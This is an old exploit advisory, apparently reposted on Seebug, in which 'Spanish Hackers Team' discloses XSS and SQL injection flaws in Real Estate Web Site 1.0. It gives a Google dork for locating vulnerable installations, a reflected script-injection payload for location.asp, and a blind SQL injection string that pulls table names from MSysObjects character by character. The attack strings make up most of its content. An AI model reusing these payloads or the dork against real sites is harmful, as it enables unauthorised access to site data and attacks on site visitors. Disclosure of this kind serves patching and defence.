--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==-- --==+ Real Estate Web Site 1.0 (SQL/XSS) Multiple Remote Vulnerabilities +==-- --==+====================================================================================+==-- - dreaming of necessity is reason to comply - [+] Info: [~] Bug found by JosS [~] sys-project[at]hotmail.com [~] http://www.spanish-hackers.com [~] EspSeC & Hack0wn!. [~] Software: Real Estate Web Site 1.0 [~] HomePage: http://www.real-estate-website.org/ [~] Exploit: Multiple Remote Vulnerabilities [High] [~] Dork: "powered by real-estate-website" [+] Cross Site Scripting: [~] Vuln file: location.asp [~] Exploit: http://localhost/PATH/location.asp?name=[XSS] [~] Example: http://localhost/PATH/location.asp?name="><script>alert('JosS')</script> [+] Remote SQL Injection: [~] Vuln file: location.asp [~] Exploit: http://localhost/PATH/location.asp?name=JosS&location=[SQL] [~] Example: IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Namee%20from%20MSysObjects))='a',0,'done')%00 --==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==-- --==+ JosS +==-- --==+====================================================================================+==-- [+] [The End] # milw0rm.com [2008-06-09]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论